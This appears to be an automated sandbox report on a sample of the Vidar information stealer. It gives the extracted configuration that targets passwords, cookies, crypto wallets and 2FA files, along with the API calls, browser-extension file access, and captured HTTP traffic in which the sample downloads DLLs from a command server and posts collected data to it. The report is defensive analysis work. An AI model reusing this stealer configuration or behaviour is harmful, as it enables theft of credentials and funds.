Source: HTTP data |
Malware Configuration Extractor: Vidar {"Saved Password": "1", "Cookies": "1", "Wallet": "1", "Internet History": "1", "Telegram": "1", "Screenshot": "1", "Grabber": "1", "Max Size": "250", "Search Path": "%DESKTOP%\\", "Extensions": ["*.txt", "*.dat", "*wallet*.*", "*2fa*.*", "*backup*.*", "*code*.*", "*password*.*", "*auth*.*", "*google*.*", "*utc*.*", "*UTC*.*", "*crypt*.*", "*key*.*"], "Max Filesize": "50", "Recusrive Search": "true", "Ignore Strings": "movies:music:mp3"} |
Source: 1.2.T6zZFfRLqs.exe.21f0e50.1.unpack |
Avira: Label: TR/Patched.Ren.Gen |
Source: 1.3.T6zZFfRLqs.exe.2330000.0.unpack |
Avira: Label: TR/Patched.Ren.Gen |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
Code function: 1_2_00416200 CryptUnprotectData,LocalAlloc,_memmove,LocalFree, |
1_2_00416200 |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
Code function: 1_2_00416190 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, |
1_2_00416190 |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
Code function: 1_2_00416340 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove, |
1_2_00416340 |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
Unpacked PE file: 1.2.T6zZFfRLqs.exe.400000.0.unpack |
Source: T6zZFfRLqs.exe |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
File opened: C:\Windows\SysWOW64\msvcr100.dll |
Jump to behavior |
Source: unknown |
HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.6:49740 version: TLS 1.2 |
Source: |
Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr |
Source: |
Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.1.dr |
Source: |
Binary string: vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr |
Source: |
Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140[1].dll.1.dr |
Source: |
Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr |
Source: |
Binary string: 0C:\zevubur.pdb source: T6zZFfRLqs.exe |
Source: |
Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.1.dr |
Source: |
Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr |
Source: |
Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.1.dr |
Source: |
Binary string: C:\zevubur.pdb source: T6zZFfRLqs.exe |
Source: |
Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr |
Source: |
Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3[1].dll.1.dr |
Source: |
Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.1.dr |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
Code function: 1_2_0041B590 _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose, |
1_2_0041B590 |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
Code function: 1_2_00496670 FindFirstFileW,FindNextFileW,FindNextFileW, |
1_2_00496670 |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
Code function: 1_2_0041B810 __wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose, |
1_2_0041B810 |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
Code function: 1_2_0040EB20 _sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose, |
1_2_0040EB20 |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
Code function: 1_2_00405D80 _memset,_memset,_memset,_memset,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,lstrcpyW,lstrcatW,_memset,_memset,_memset,_memset,FindClose,FindClose,_memset,_memset,_memset,_memset, |
1_2_00405D80 |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
Code function: 1_2_0040F150 _strtok,_strtok,_memmove,_memmove,__wgetenv,_memmove,__wgetenv,_memmove,_memmove,_memmove,_memmove,_memmove,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok, |
1_2_0040F150 |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ |
Jump to behavior |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ |
Jump to behavior |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ |
Jump to behavior |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ |
Jump to behavior |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ |
Jump to behavior |
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ |
Jump to behavior |
Source: Joe Sandbox View |
JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: global traffic |
HTTP traffic detected: GET /@killern0 HTTP/1.1Host: mas.to |
Source: global traffic |
HTTP traffic detected: POST /1008 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A-- |
Source: global traffic |
HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 86263Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cache |
Source: Joe Sandbox View |
IP Address: 88.99.75.82 88.99.75.82 |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:08 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f |